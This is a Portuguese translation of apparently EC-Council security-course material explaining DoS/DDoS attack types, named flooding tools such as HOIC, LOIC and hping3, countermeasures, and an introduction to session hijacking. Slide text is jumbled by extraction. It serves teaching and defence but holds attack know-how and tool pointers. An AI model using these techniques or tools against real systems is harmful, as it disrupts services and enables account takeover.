O invasor inicia o ataque DDoS enviando um comando para agentes zumbis, que são computadores conectados à
Internet comprometidos por um invasor por meio de programas de malware para executar várias atividades maliciosas
por meio de um servidor de comando e controle (C&C). Esses agentes zumbis enviam uma solicitação de conexão
para um grande número de sistemas refletores com o endereço IP falsificado da vítima, o que faz com que os sistemas
refletores presumam que essas solicitações se originam da máquina da vítima e não dos agentes zumbis. Assim, os
sistemas refletores enviam as informações solicitadas (resposta ao pedido de conexão) à vítima.
Consequentemente, a máquina da vítima é inundada com respostas não solicitadas de vários computadores refletores
simultaneamente, o que pode reduzir o desempenho ou fazer com que a máquina da vítima desligue completamente.
Figura 6.24: Esquema de um ataque DDoS

Técnicas de ataque DoS/DDoS: UDP Flood Attack
Um invasor envia pacotes UDP falsificados a uma taxa de pacotes

muito alta para um host remoto em portas aleatórias de um servidor
de destino usando um grande intervalo de IP de origem O atacante envia
Atacante Pacotes UDP com endereço IP servidor de destino
falsificado e portas UDP de destino aleatório
A inundação de pacotes UDP faz com que o servidor verifique Pacote UDP
repetidamente aplicativos inexistentes nas portas
Pacote UDP
Pacote UDP
Aplicativos legítimos são inacessíveis pelo sistema e fornecem uma

Pacote UDP
resposta de erro com um ICMP “Destination
Pacote inacessível”
Pacotes
de erro
Este ataque consome recursos de rede e largura de banda disponível, ICMP de
destino inacessíveis
exaurindo a rede até que ela fique offline
Técnicas de ataque DoS/DDoS
Ataque de inundação UDP
Em um ataque de inundação de UDP, um invasor envia pacotes UDP falsificados a uma taxa de pacotes muito alta para
um host remoto em portas aleatórias de um servidor de destino usando um grande intervalo de IP de origem. A inundação
de pacotes UDP faz com que o servidor verifique repetidamente se há aplicativos inexistentes nas portas.
Consequentemente, aplicativos legítimos tornam-se inacessíveis pelo sistema e qualquer tentativa de acesso retorna
uma resposta de erro com um pacote ICMP “Destino inacessível”. Esse ataque consome recursos de rede e largura de
banda disponível, exaurindo a rede até que ela fique offline.
Figura 6.25: Ataque de inundação UDP

Técnicas de ataque DoS/DDoS: ICMP Flood Attack
Os ataques de inundação ICMP são um tipo de ataque

no qual os invasores enviam grandes volumes de O invasor envia solicitações ICMP
Atacante servidor de destino
ECHO com endereços de origem falsificados
Pacotes de solicitação de eco ICMP para um
sistema vítima diretamente ou por meio de redes
Solicitação de ECO
de reflexão
Resposta ECO
Esses pacotes avisam o sistema da vítima para Resposta ECO
responder, e a combinação resultante de tráfego satura

a largura de banda da conexão de rede da vítima,
-Limite máximo de solicitações ICMP ECHO por segundo
fazendo com que ela fique sobrecarregada e ,

subsequentemente, pare de responder a solicitações
TCP/IP legítimas Solicitação de ECO
Solicitação ICMP ECHO legítima de um

endereço na mesma zona de segurança
Ataque de Inundação ICMP
Os administradores de rede usam o ICMP principalmente para operações de IP, solução de problemas e mensagens de
erro para pacotes não entregues. Nesse ataque, os invasores enviam grandes volumes de pacotes de solicitação de
eco ICMP para o sistema da vítima diretamente ou por meio de redes de reflexão. Esses pacotes avisam o sistema da
vítima para responder, e o grande tráfego satura a largura de banda da conexão de rede da vítima, fazendo com que ela
fique sobrecarregada e, subsequentemente, pare de responder a solicitações TCP/IP legítimas.
Para proteger contra ataques de inundação de ICMP, é necessário definir um limite que invoque o recurso de proteção
contra ataques de inundação de ICMP quando excedido. Quando o limite ICMP é excedido (por padrão, o valor limite é
1000 pacotes/s), o roteador rejeita solicitações de eco ICMP adicionais de todos os endereços na mesma zona de
segurança pelo restante do segundo atual, bem como pelo próximo segundo.

Figura 6.26: ataque de inundação ICMP

Técnicas de ataque DoS/DDoS:

Ataque Ping da Morte
Em um ataque Ping of Death (PoD), um invasor tenta travar,
desestabilizar ou congelar o sistema ou serviço de destino
enviando pacotes malformados ou superdimensionados
usando um simples comando ping
Por exemplo, o invasor envia um pacote com tamanho de 65.538

bytes para o servidor Web de destino. Esse tamanho de pacote
excede o limite de tamanho prescrito pelo RFC 791 IP, que é de
65.535 bytes. O processo de remontagem do
20 bytes 8 bytes 65.510 bytes
CABEÇALHO IP CABEÇALHO ICMP DADOS ICMP
Atacante servidor de destino
Ataque Ping da Morte
Em um ataque Ping of Death (PoD), um invasor tenta travar, desestabilizar ou congelar o sistema ou
serviço de destino enviando pacotes malformados ou superdimensionados usando um simples comando ping.
Suponha que um invasor envie um pacote com um tamanho de 65.538 bytes para o servidor Web de
destino. Esse tamanho excede o limite de tamanho prescrito pelo RFC 791 IP, que é de 65.535 bytes. O
processo de remontagem executado pelo sistema receptor pode fazer com que o sistema falhe. Nesses
ataques, a identidade do invasor pode ser facilmente falsificada e o invasor pode não precisar de
conhecimento detalhado da máquina de destino, exceto seu endereço IP.
Figura 6.27: Ataque de ping da morte

Técnicas de Ataque DoS/DDoS: Ataque Smurf

O invasor falsifica o endereço IP de origem com o endereço IP da vítima e envia um grande número de mensagens ICMP
ECHO solicita pacotes para uma rede de transmissão IP
Isso faz com que todos os hosts na rede de transmissão respondam às solicitações ICMP ECHO recebidas . Essas
respostas serão enviadas para a máquina da vítima, causando o travamento da máquina.
Atacante
Rede de transmissão IP
Vítima
Ataque Smurf
Em um ataque Smurf, o invasor falsifica o endereço IP de origem com o endereço IP da vítima e envia um grande
número de pacotes de solicitação ICMP ECHO para uma rede de transmissão IP. Isso faz com que todos os hosts na
rede de transmissão respondam às solicitações ICMP ECHO recebidas. Essas respostas são enviadas para a
máquina da vítima porque o endereço IP foi falsificado pelo invasor, causando um tráfego significativo na máquina da
vítima e, por fim, fazendo-a travar.
Figura 6.28: Ataque Smurf

Técnicas de ataque DoS/DDoS: ataque de inundação SYN
O invasor envia um grande número de

solicitações SYN com endereços IP de origem Anfitrião A Hospedeiro B
falsos para o servidor de destino (vítima)

Estabelecimento de conexão
normal
A máquina de destino envia de volta um SYN/ACK

em resposta à solicitação e espera que o ACK
conclua a configuração da sessão
A máquina de destino não obtém a resposta porque

o endereço de origem é falso Inundação SYN
A inundação de SYN aproveita uma falha na

implementação do handshake de três vias TCP na
maioria dos hosts
Ataque de Inundação SYN
Em um ataque SYN, o invasor envia um grande número de solicitações SYN ao servidor de destino (vítima) com endereços
IP de origem falsos. O ataque cria conexões TCP incompletas que consomem recursos de rede. Normalmente, quando um
cliente deseja iniciar uma conexão TCP com um servidor, o cliente e o servidor trocam a seguinte série de mensagens:
ÿ Um pacote de solicitação TCP SYN é enviado a um servidor.
ÿ O servidor envia um SYN/ACK (reconhecimento) em resposta à solicitação.
ÿ O cliente envia uma resposta ACK ao servidor para concluir a configuração da sessão.
Este método é um “aperto de mão de três vias”.
Em um ataque SYN, o invasor explora o método de handshake de três vias. Primeiro, o invasor envia uma solicitação TCP
SYN falsa ao servidor de destino. Depois que o servidor envia um SYN/ACK em resposta à solicitação do cliente (atacante),
o cliente nunca envia uma resposta ACK. Isso deixa o servidor esperando para concluir a conexão.
A inundação de SYN aproveita a maneira falha em que a maioria dos hosts implementa o handshake de três vias TCP. Esse
ataque ocorre quando o invasor envia pacotes SYN (solicitações) ilimitados ao sistema host. O processo de transmissão
desses pacotes é mais rápido do que o sistema pode suportar. Normalmente, uma conexão é estabelecida com o handshake
de três vias TCP.
O host rastreia conexões parcialmente abertas enquanto espera por pacotes ACK de resposta em uma fila de escuta.
Conforme mostrado na figura, quando o Host B recebe uma solicitação SYN do Host A, ele deve acompanhar a conexão
parcialmente aberta em uma “fila de escuta” por pelo menos 75 s.

Figura 6.29: ataque de inundação SYN
Um host mal-intencionado pode explorar outro host, gerenciando muitas conexões parciais enviando
várias solicitações SYN ao host de destino simultaneamente. Quando a fila está cheia, o sistema não
pode abrir novas conexões até que elimine algumas entradas da fila de conexão por meio de timeouts
de handshake. Essa capacidade de manter cada conexão incompleta por 75 segundos pode ser
explorada cumulativamente em um ataque DoS. O ataque usa endereços IP falsos, dificultando o
rastreamento da origem. Um invasor pode preencher uma tabela de conexões mesmo sem falsificar o endereço IP de orig

Técnicas de ataque DoS/DDoS:

Ataque de fragmentação
ÿ Esses ataques impedem que uma vítima seja capaz de remontar pacotes fragmentados inundando o
sistema de destino com fragmentos TCP ou UDP, resultando em desempenho reduzido
ÿ Os invasores enviam um grande número de pacotes fragmentados (mais de 1.500 bytes) para um servidor da Web de destino com
uma taxa de pacotes relativamente pequena
ÿ Remontar e inspecionar esses grandes pacotes fragmentados consome recursos excessivos
Pacote Original
IP Segmento de Segmento de Segmento de Segmento de

Cabeçalho dados 1 dados 2 dados 3 dados 4
EU EU EU EU
P P P P
H H H H
E
Dados E
Dados E
Dados Dados
E
UMA UMA UMA UMA
D segmento 1 D segmento 2 D segmento 3 D

segmento 4
E E E E
R R R R
Fragmento 1 Fragmento 2 Fragmento 3 Fragmento 4
Ataque de fragmentação
Esses ataques destroem a capacidade da vítima de remontar pacotes fragmentados inundando-os com
fragmentos TCP ou UDP, resultando em desempenho reduzido. Nos ataques de fragmentação, o invasor
envia um grande número de pacotes fragmentados (mais de 1.500 bytes) para um servidor Web de
destino com uma taxa de pacotes relativamente pequena. Como o protocolo permite fragmentação,
esses pacotes geralmente não são inspecionados à medida que passam por equipamentos de rede,
como roteadores, firewalls e o sistema de detecção de intrusão (IDS)/sistema de prevenção de intrusão
(IPS). A remontagem e a inspeção desses pacotes grandes e fragmentados consomem recursos
excessivos. Além disso, o conteúdo dos fragmentos do pacote é randomizado pelo invasor, o que faz
com que a remontagem e a inspeção consumam mais recursos e, por sua vez, causem o travamento do sistema.
Figura 6.30: Ataque de fragmentação

DoS/DDoS Os invasores usam combinações de ataques volumétricos, de

protocolo e de camada de aplicativo para desativar o sistema ou serviço de destino
Ataque
Técnicas:
Multivetor Os invasores alteram rápida e repetidamente a forma de seu ataque DDoS
Ataque (por exemplo, pacotes SYN, Camada 7)
Volumétrico Protocolo Inscrição

Ataque multivetorial Ataque Ataque Ataque de Camada
em sequência
Atacante Vítima
Ataque Volumétrico
Ataque multivetorial Ataque de protocolo
em paralelo
Ataque à Camada de Aplicação

Atacante Vítima
Ataque multivetorial
Em ataques DDoS multivetoriais, o invasor usa combinações de ataques volumétricos, de protocolo e de camada
de aplicativo para derrubar o sistema ou serviço de destino. O invasor muda rapidamente de uma forma de ataque
DDoS (por exemplo, pacotes SYN) para outra (camada 7). Esses ataques são lançados por um vetor por vez ou
por vários vetores em paralelo para confundir o departamento de TI de uma empresa, fazendo com que gastem
todos os seus recursos e desviando seu foco de forma maliciosa.
Figura 6.31: Ataque multivetorial

Técnicas de Ataque DoS/DDoS: Ataque Peer-to-Peer

ÿ Os invasores instruem os clientes de hubs de compartilhamento de arquivos ponto a ponto a se desconectarem de seus
rede e se conectar ao site falso da vítima
ÿ Os invasores exploram as falhas encontradas na rede usando o protocolo DC++ (Direct Connect), que é
usado para compartilhar todos os tipos de arquivos entre clientes de mensagens instantâneas
ÿ Usando esse método, os invasores lançam ataques maciços de negação de serviço e comprometem sites
usuário 5 usuário 4
tráfego de ataque
usuário 3
Atacante
Usuário 2
Usuário 1
Ataque ponto a ponto
Um ataque ponto a ponto é uma forma de ataque DDoS em que o invasor explora vários bugs em servidores ponto a
ponto para iniciar um ataque DDoS. Os invasores exploram falhas encontradas em redes que utilizam o protocolo
Direct Connect (DC++), que permite a troca de arquivos entre clientes de mensagens instantâneas. Esse tipo de
ataque não usa botnets. Ao contrário de um ataque baseado em botnet, um ataque ponto a ponto elimina a
necessidade de os invasores se comunicarem com os clientes que eles subvertem. Aqui, o invasor instrui os clientes
de grandes hubs de compartilhamento de arquivos ponto a ponto a se desconectarem de sua rede ponto a ponto e,
em vez disso, se conectarem ao site da vítima. Conseqüentemente, vários milhares de computadores podem tentar
se conectar agressivamente a um site de destino, causando uma queda no desempenho do site de destino. É fácil
identificar ataques ponto a ponto com base em assinaturas. Ao usar esse método, os invasores lançam ataques DoS
massivos para comprometer sites.
Ataques DDoS ponto a ponto podem ser minimizados especificando portas para comunicação ponto a ponto. Por
exemplo, especificar a porta 80 para impedir a comunicação ponto a ponto minimiza a possibilidade de ataques a
sites.

Figura 6.32: Ataque ponto a ponto

DoS/DDoS Attack
Técnicas:
Ataque permanente de
negação de serviço
DoS permanente, também conhecido Ao contrário de outros ataques DoS, Este ataque é realizado usando Usando esse método, os invasores
como phlashing, refere-se a ataques ele sabota o hardware do sistema, um método conhecido como enviam atualizações de hardware
que causam danos irreversíveis exigindo que a vítima substitua ou “bricking a system” fraudulentas às vítimas
danos ao hardware do sistema reinstale o hardware
Envia e-mail, chats de IRC, tweets, postagens,

vídeos com conteúdo fraudulento para atualizações de hardware
Atacante obtém acesso ao computador da vítima

Vítima
Atacante (Código malicioso é executado)
Ataque permanente de negação de serviço
Os ataques DoS permanentes (PDoS), também conhecidos como phlashing, visam exclusivamente o hardware e
causam danos irreversíveis ao hardware. Ao contrário de outros tipos de ataques DoS, ele sabota o hardware do
sistema, exigindo que a vítima substitua ou reinstale o hardware. O ataque PDoS explora falhas de segurança em um
dispositivo para permitir a administração remota nas interfaces de gerenciamento do hardware da vítima, como
impressoras, roteadores e outros dispositivos de rede.
Esse tipo de ataque é mais rápido e destrutivo do que os ataques DoS convencionais. Ele funciona com uma
quantidade limitada de recursos, ao contrário de um ataque DDoS, no qual os atacantes lançam um conjunto de
zumbis em um alvo. Os invasores executam ataques PDoS usando um método conhecido como “bricking” de um
sistema. Nesse método, o invasor envia e-mails, chats de IRC, tweets ou vídeos com conteúdo fraudulento para
atualizações de hardware para a vítima. As atualizações de hardware são modificadas e corrompidas com
vulnerabilidades ou firmware defeituoso. Quando a vítima clica em um link ou janela pop-up referente à atualização de
hardware fraudulenta, ela a instala em seu sistema. Consequentemente, o invasor obtém controle total sobre o sistema
da vítima.
Figura 6.33: Ataque DoS permanente

Técnicas de Ataque DoS/DDoS: Reflexão Distribuída

Ataque de negação de serviço (DRDoS)
ÿ O DDoS, também conhecido como ataque falsificado, envolve o uso de várias máquinas
intermediárias e secundárias que contribuem para o ataque DDoS real contra a máquina ou aplicativo alvo
ÿ Os invasores iniciam esse ataque enviando solicitações aos hosts intermediários, que redirecionam as
solicitações para as máquinas secundárias, que, por sua vez, refletem o tráfego de ataque ao alvo
primário
Alvo
Atacante
Vítimas intermediárias
Vítimas Secundárias
Ataque de negação de serviço de reflexão distribuída (DRDoS)
Um ataque DoS de reflexão distribuída (DRDoS), também conhecido como ataque “falsificado”, envolve
o uso de várias máquinas intermediárias e secundárias que contribuem para um ataque DDoS contra
uma máquina ou aplicativo de destino. Um ataque de DRDoS explora a vulnerabilidade de handshake
de três vias do TCP.
Este ataque envolve uma máquina atacante, vítimas intermediárias (zumbis), vítimas secundárias
(refletores) e uma máquina alvo. O invasor inicia esse ataque enviando solicitações aos hosts
intermediários, que por sua vez refletem o tráfego de ataque ao alvo.
O processo de um ataque DDRDoS é o seguinte. Primeiro, o invasor comanda as vítimas intermediárias

(zumbis) para enviar um fluxo de pacotes (TCP SYN) com o endereço IP do alvo primário como o
endereço IP de origem para outras máquinas não comprometidas (vítimas secundárias ou refletores) a
fim de exortá-los a estabelecer uma conexão com o alvo primário. Consequentemente, os refletores
enviam um grande volume de tráfego (SYN/ACK) para o alvo primário para estabelecer uma nova
conexão com ele porque acreditam que o host o solicitou. O alvo primário descarta os pacotes SYN/ACK
recebidos dos refletores porque eles não enviaram o pacote SYN.
Enquanto isso, os refletores aguardam a resposta ACK do alvo primário. Assumindo que o pacote foi
perdido, as máquinas refletoras reenviam pacotes SYN/ACK para o alvo primário para estabelecer a
conexão, até que ocorra um time-out. Desta forma, a máquina alvo é inundada com um grande volume
de tráfego das máquinas refletoras. A largura de banda combinada dessas máquinas refletoras
sobrecarrega a máquina alvo.
Um ataque DRDoS é um ataque inteligente porque é muito difícil ou mesmo impossível rastrear o invasor.
Em vez do atacante real, as vítimas secundárias (refletores) parecem atacar o alvo primário diretamente.
Esse ataque é mais eficaz do que um ataque DDoS típico porque várias vítimas intermediárias e
secundárias geram uma enorme largura de banda de ataque.

Figura 6.34: Ataque DoS de reflexão distribuída (DRDoS)

Ferramentas de Ataque DoS/DDoS
hping3
Uma ferramenta de varredura de rede
orientada a linha de comando e criação de
pacotes para o protocolo TCP/IP que envia
solicitações de eco ICMP e suporta TCP, UDP,
Protocolos ICMP e IP bruto
Ferramentas de ataque DoS/DDoS (continuação)

Canhão de íons de alta órbita (HOIC) XOIC

http:// anonhacktivism.blog
ÿ HOIC realiza um DDoS para atacar spot.com
qualquer endereço IP com uma porta
selecionada pelo usuário e um protocolo HULK
selecionado pelo usuário https:// siberianlaika.ru
Martelo de Tor
Slowloris
Canhão de íons de baixa órbita (LOIC)
https:// github.com
ÿ LOIC pode ser usado em um site de destino
para inundar o servidor com pacotes TCP,
PyLoris
Pacotes UDP ou solicitações HTTP com a
intenção de interromper o serviço de um
determinado host
RU-Dead-Yet
ÿ cavalos de potência3
Fonte: http:// www.hping.org
hping3 é uma ferramenta de criação de pacotes e varredura de rede orientada por linha de comando para o
protocolo TCP/IP que envia solicitações de eco ICMP e oferece suporte aos protocolos TCP, UDP, ICMP e IP
bruto.

Figura 6.35: Capturas de tela do hping3
ÿ Canhão de íons de alta órbita (HOIC)
HOIC é um aplicativo de estresse de rede e ataque DoS/DDoS escrito em linguagem BASIC. Ele foi projetado para
atacar até 256 URLs de destino simultaneamente. Ele envia solicitações HTTP POST e GET para um computador
que usa GUIs inspiradas no lulz. Suas características são resumidas a seguir:
o Flooding HTTP multi-threaded de alta velocidade
o Inundação simultânea de até 256 sites
o Sistema de script integrado para permitir a implantação de “boosters”, que são scripts
projetado para impedir as contramedidas de DDoS e aumentar a saída de DoS
o Portabilidade para Linux/Mac com algumas correções de bugs
o Capacidade de selecionar o número de threads em um ataque em andamento
o Capacidade de limitar os ataques individualmente com três configurações: BAIXO, MÉDIO e ALTO

Figura 6.36: Captura de tela da ferramenta de ataque HOIC DoS
ÿ Canhão de íons de baixa órbita (LOIC)
LOIC é um aplicativo de teste de estresse de rede e ataque DoS. Os ataques LOIC podem ser chamados de
ataques DOS baseados em aplicativos porque visam principalmente aplicativos da web. O LOIC pode ser
usado em um site de destino para inundar o servidor com pacotes TCP, pacotes UDP ou solicitações HTTP
com a intenção de interromper o serviço.
Figura 6.37: Captura de tela da ferramenta de ataque LOIC DoS

A seguir estão algumas das ferramentas adicionais de ataque DoS/DDoS:
ÿ XOIC (http:// anonhacktivism.blogspot.com)
ÿ HULK (https:// siberianlaika.ru)
ÿ Martelo de Tor (https:// sourceforge.net)
ÿ Slowloris (https:// github.com)
ÿ PyLoris (https:// sourceforge.net)
ÿ RU-Dead-Yet (https:// sourceforge.net)

Fluxo
nosso do módulo
recurso
Discutir tipos de ataques DoS

e DDoS
Discutir DoS e DDoS

Discutir contramedidas de ataque DoS e DDoS
DoS/DDoS é uma das principais ameaças de segurança na Internet; assim, há uma grande
necessidade de soluções para mitigar esses ataques. Esta seção discute várias medidas
preventivas e ferramentas de proteção contra DoS/DDoS.

DoS/DDoS Attack Countermeasures
Use mecanismos de criptografia fortes , como Bloqueie todos os pacotes de entrada

WPA2 ou AES 256, para redes de banda larga para originários de portas de serviço para bloquear o
proteção contra espionagem tráfego de servidores de reflexão
Certifique-se de que o software e os protocolos

estejam atualizados e verifique as máquinas
Atualize cada kernel para sua versão mais recente
completamente para detectar qualquer
comportamento anômalo
Impedir a transmissão de pacotes endereçados de

Desativar serviços não utilizados e inseguros
forma fraudulenta no nível do ISP
DoS/DDoS Attack Countermeasures
A implementação de mecanismos defensivos em locais apropriados, seguindo as medidas adequadas, permite aumentar
a segurança da rede organizacional. A seguir está uma lista de contramedidas para combater ataques DoS/DDoS:
ÿ Use mecanismos de criptografia fortes, como WPA2 e AES 256 para redes de banda larga
para se defender de espionagem
ÿ Assegurar que os softwares e protocolos estão atualizados e escanear as máquinas

cuidadosamente para detectar qualquer comportamento anômalo
ÿ Atualize o kernel para a versão mais recente e desabilite serviços não utilizados e inseguros
ÿ Bloqueie todos os pacotes de entrada originários das portas de serviço para bloquear o tráfego de
servidores de reflexão
ÿ Habilitar proteção de cookies TCP SYN
ÿ Impedir a transmissão de pacotes endereçados de forma fraudulenta ao nível do ISP
ÿ Implementar rádios cognitivos na camada física para lidar com interferências e embaralhamentos
ataques
ÿ Configure o firewall para negar o acesso ao tráfego ICMP externo
ÿ Administração remota segura e testes de conectividade
ÿ Realizar validação de entrada completa
ÿ Impedir que os dados processados pelo invasor sejam executados
ÿ Impedir o uso de funções desnecessárias, como gets e strcpy
ÿ Impedir que os endereços de retorno sejam sobrescritos

Ferramentas de proteção DoS/DDoS
Anti DDoS
Uma ferramenta de proteção contra ataques DDoS que
Guardião
protege servidores IIS, servidores Apache, servidores de Proteção Imperva DDoS https://
jogos, servidores Camfrog, servidores de correio, etc. www.imperva.com
Serviço de proteção DDoS da

DOSarrest https:// www.dosarrest.com
DDoS-GUARD
https:// ddos-guard.net
Cloudflare
https:// www.cloudflare.com
F5
https:// f5.com
http:// www.beethink.com
Ferramentas de proteção DoS/DDoS
ÿ Guardião Anti DDoS
Fonte: http:// www.beethink.com
Anti DDoS Guardian é uma ferramenta de proteção contra ataques DDoS. Ele protege servidores IIS, servidores
Apache, servidores de jogos, servidores Camfrog, servidores de correio, servidores FTP, VOIP PBX e
servidores SIP e outros sistemas. O Anti DDoS Guardian monitora cada pacote de entrada e saída em tempo
real.
Figura 6.38: Captura de tela da ferramenta Anti DDoS Guardian

Veja a seguir exemplos de ferramentas adicionais de proteção contra DDoS:
ÿ Imperva DDoS Protection (https://www.imperva.com)
ÿ Serviço de proteção DDoS do DOSarrest (https:// www.dosarrest.com)
ÿ DDoS-GUARD (https:// ddos-guard.net)
ÿ Cloudflare (https://www.cloudflare.com)
ÿ F5 (https:// f5.com)

Sequestro de Sessão
Sequestro de Sessão
O sequestro de sessão permite que os invasores assumam uma sessão ativa ignorando o processo de
autenticação. Depois disso, eles podem executar qualquer ação no sistema sequestrado. Esta seção visa
fornecer informações abrangentes sobre o seqüestro de sessão.

Fluxo do módulo
Discutir tipos de sessão

Ataques de sequestro
Discutir o seqüestro de sessão

Copyright © de Copyright ©Todos

de EC-Council Council.
Discutir tipos de ataques de sequestro de sessão

A familiarização com os conceitos básicos relacionados ao seqüestro de sessão é importante para obter um
entendimento abrangente. Esta seção explica o que é o seqüestro de sessão, bem como os motivos pelos
quais o seqüestro de sessão é bem-sucedido. Ele também discute o processo de sequestro de sessão, tipos
de sequestro de sessão, sequestro de sessão em um modelo OSI (Open Systems Interconnection), diferenças
entre falsificação e sequestro e ferramentas de sequestro de sessão.

O que é Sequestro de Sessão?

Sequestro de sessão refere-se a um ataque no qual um invasor Transmissão de Credencial
assume o controle de uma sessão de comunicação TCP válida Confirmação de credencial
entre dois computadores

Configuração da Sessão
Configuração da Sessão
Pedido de data
Como a maioria das autenticações ocorre apenas no início de
Transmissão de dados
uma sessão TCP, isso permite que o invasor obtenha acesso a
uma máquina Vítima Transmissão de dados Servidor web
Transmissão de dados
Os invasores podem farejar todo o tráfego das sessões TCP

cheirou
estabelecidas e realizar roubo de identidade, roubo de informações, Tráfego
fraude, etc.
Pedido de data
O invasor rouba um ID de sessão válido e o usa para se Transmissão de dados
autenticar no servidor
Atacante
O que é Sequestro de Sessão?
Um servidor web envia um token ou chave de identificação de sessão para um cliente web após autenticação
bem-sucedida. Esses tokens de sessão diferenciam várias sessões que o servidor estabelece com os
clientes. Os servidores da Web usam vários mecanismos para gerar tokens aleatórios e controles para
proteger os tokens durante a transmissão.
O seqüestro de sessão é um ataque no qual um invasor assume uma sessão de comunicação TCP
(Transmission Control Protocol) válida entre dois computadores. Como a maioria dos tipos de autenticação
é executada apenas no início de uma sessão TCP, um invasor pode obter acesso a uma máquina enquanto
uma sessão está em andamento. Os invasores podem farejar todo o tráfego de sessões TCP estabelecidas
e realizar roubo de identidade, roubo de informações, fraude, etc.
Um ataque de sequestro de sessão explora um mecanismo de geração de token de sessão ou controles de

segurança de token para que o invasor possa estabelecer uma conexão não autorizada com um servidor de
destino. O invasor pode adivinhar ou roubar um ID de sessão válido, que identifica usuários autenticados, e
usá-lo para estabelecer uma sessão com o servidor. O servidor da Web responde às solicitações do invasor
com a impressão de que está se comunicando com um usuário autenticado.
Os invasores podem usar o seqüestro de sessão para lançar vários tipos de ataques, como ataques man-
in-the-middle (MITM) e ataques de negação de serviço (DoS). Em um ataque MITM, um invasor se coloca
entre um cliente autorizado e um servidor realizando o seqüestro de sessão para garantir que as informações
que fluem em qualquer direção passem por eles. No entanto, o cliente e o servidor acreditam que estão se
comunicando diretamente entre si. Os invasores também podem farejar informações confidenciais e
interromper sessões para iniciar um ataque DoS.

Figura 6.39: Exemplo de sequestro de sessão

Por que o seqüestro de sessão é bem-sucedido?
Ausência de bloqueio de conta para IDs de sessão inválidos
Algoritmo de geração de ID de sessão fraco ou IDs de sessão pequenos
Tratamento inseguro de IDs de sessão
Tempo limite de sessão indefinido
A maioria dos computadores que usam TCP/IP são vulneráveis
A maioria das contramedidas não funcionam sem criptografia
Por que o seqüestro de sessão é bem-sucedido?
O seqüestro de sessão é bem-sucedido devido aos seguintes fatores.
ÿ Ausência de bloqueio de conta para IDs de sessão inválidos: Se um site não implementar o bloqueio
de conta, um invasor poderá fazer várias tentativas de conexão com IDs de sessão variados
incorporados em uma URL genuína. O invasor pode continuar fazendo tentativas até que o ID da
sessão real seja determinado. Este ataque também é conhecido como ataque de força bruta. Durante
um ataque de força bruta, o servidor da Web não exibe uma mensagem de aviso ou reclamação,
permitindo que o invasor determine o ID de sessão válido.
ÿ Algoritmo de geração de ID de sessão fraco ou IDs de sessão pequenos: a maioria dos sites usa
algoritmos lineares para prever variáveis como hora ou endereço IP para gerar IDs de sessão. Ao
estudar o padrão sequencial e gerar várias solicitações, um invasor pode restringir facilmente o espaço
de pesquisa necessário para forjar um ID de sessão válido. Mesmo se um algoritmo de geração de ID
de sessão forte for usado, um ID de sessão ativo pode ser facilmente determinado se a string for curta.
ÿ Tratamento inseguro de IDs de sessão: um invasor pode recuperar informações de ID de sessão

armazenadas enganando o navegador do usuário para que ele visite outro site. Antes que a sessão
expire, o invasor pode explorar as informações de várias maneiras, como envenenamento do Sistema
de Nomes de Domínio (DNS), exploração de script entre sites e exploração de um bug no navegador.
ÿ Tempo limite de sessão indefinido: IDs de sessão com tempo de expiração indefinido fornecem ao
invasor tempo ilimitado para adivinhar um ID de sessão válido. Um exemplo disso é a opção “lembre-
se de mim” em muitos sites. O invasor pode usar IDs de sessão estáticos para a conta da Web do
usuário após capturar o arquivo de cookie do usuário. O atacante também pode realizar

seqüestro de sessão se eles puderem invadir um servidor proxy, que potencialmente registra ou armazena em cache
IDs de sessão.
ÿ A maioria dos computadores que usam TCP/Internet Protocol (IP) são vulneráveis: Todas as máquinas que
executam TCP/IP são vulneráveis ao seqüestro de sessão devido às falhas de projeto inerentes ao TCP/IP.
ÿ A maioria das contramedidas não funciona sem criptografia: é fácil detectar IDs de sessão em uma rede plana se a
segurança de transporte não for configurada corretamente durante a transmissão de cookies de ID de sessão, mesmo
se um aplicativo da Web usar criptografia Secure Sockets Layer (SSL).
A tarefa de um invasor se torna ainda mais fácil se ele capturar IDs de sessão contendo informações de login reais.

Processo de Sequestro de Sessão
Injeção de comando Iniciar a injeção de pacotes no servidor de destino
Previsão de ID de sessão Assumir a sessão
Dessincronização de sessão Interrompe a conexão com a máquina da vítima
Monitor Monitore o fluxo de pacotes e preveja o número de sequência
Sniff Coloque-se entre a vítima e o alvo (você deve ser capaz de farejar a rede)
Processo de Sequestro de Sessão
É mais fácil para um invasor entrar furtivamente em um sistema como um usuário genuíno do que entrar diretamente
no sistema. Um invasor pode sequestrar a sessão de um usuário genuíno encontrando uma sessão estabelecida e
controlando-a após a autenticação do usuário. Depois de sequestrar a sessão, o invasor pode ficar conectado por
horas sem levantar suspeitas. Durante esse período, todo o tráfego destinado ao endereço IP do usuário vai para o
sistema do invasor, e o invasor pode implantar backdoors ou obter acesso adicional ao sistema. Aqui, examinamos
como um invasor sequestra uma sessão.
Figura 6.40: Processo de sequestro de sessão

O seqüestro de sessão pode ser dividido em três fases amplas.
ÿ Rastrear a conexão
O invasor usa um farejador de rede para rastrear uma vítima e host ou usa uma ferramenta como
Nmap para escanear a rede em busca de um alvo com uma sequência TCP que seja fácil de prever. Depois
de identificar uma vítima, o invasor captura os números de sequência e confirmação da vítima porque o TCP
verifica esses números. O invasor então usa esses números
para construir pacotes.
ÿ Dessincronizando a conexão
Um estado dessincronizado ocorre quando uma conexão entre um destino e um host é estabelecida ou
estável sem transmissão de dados ou o número de sequência do servidor não é igual ao número de
confirmação do cliente ou vice-versa. Para dessincronizar a conexão entre o alvo e o host, o invasor deve
alterar o número de sequência ou o número de confirmação (SEQ/ACK) do servidor.
ÿ Injetando o pacote do atacante
Uma vez que o invasor tenha interrompido a conexão entre o servidor e o alvo, ele pode injetar dados na
rede ou participar ativamente como intermediário, passando dados do alvo para o servidor e vice-versa
enquanto lê e injeta dados à vontade .

Tipos de Sequestro de Sessão
ÿ Em um ataque passivo, um invasor

sequestra uma sessão, mas fica
para trás, observa e registra todo Passiva
o tráfego nessa sessão
ÿ Em um ataque ativo, um invasor

encontra uma sessão ativa e
Ativo
assume o controle dela
Atacante Vítima
Tipos de Sequestro de Sessão
O sequestro de sessão pode ser ativo ou passivo, dependendo do grau de envolvimento do invasor. A
diferença essencial entre um hijack ativo e passivo é que, enquanto um hijack ativo assume uma sessão
existente, um hijack passivo monitora uma sessão em andamento.
ÿ Sequestro de Sessão Passiva
Em um ataque passivo, após o sequestro de uma sessão, um invasor apenas observa e registra
todo o tráfego durante a sessão. Um ataque passivo usa sniffers na rede, permitindo que invasores
obtenham informações como IDs de usuário e senhas. O invasor pode usar posteriormente essas
informações para fazer login como um usuário válido e aproveitar os privilégios do usuário. A
